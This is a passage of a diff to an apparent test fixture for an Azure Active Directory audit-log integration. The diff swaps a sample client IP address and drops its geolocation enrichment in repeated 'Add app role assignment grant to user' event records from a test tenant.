55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125396900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -20188,25 +18442,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -20220,7 +18456,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -20352,7 +18588,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -20364,12 +18600,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036596200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125401700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -20395,25 +18631,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -20427,7 +18645,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -20559,7 +18777,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -20571,12 +18789,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036600100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"}